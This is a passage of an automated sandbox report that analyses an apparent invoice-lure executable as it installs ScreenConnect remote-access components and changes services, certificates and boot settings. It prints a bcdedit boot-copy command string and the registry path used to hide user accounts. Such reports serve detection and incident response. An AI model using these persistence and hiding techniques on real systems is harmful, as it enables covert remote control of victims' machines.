Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: ScreenConnect.ClientService.dll0.1.dr	Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Modifies existing windows services

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (89e470af-f42d-4b2f-ad1d-717711c7c76a)

Hooking and other Techniques for Hiding and Protection

Contains functionality to hide user accounts

Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1935970610.000000001BD52000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1932338060.0000000004EF2000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.1990094462.0000000002641000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.1989776192.0000000000C20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.ClientService.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll0.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.Windows.dll.1.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

Stores large binary data to the registry

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
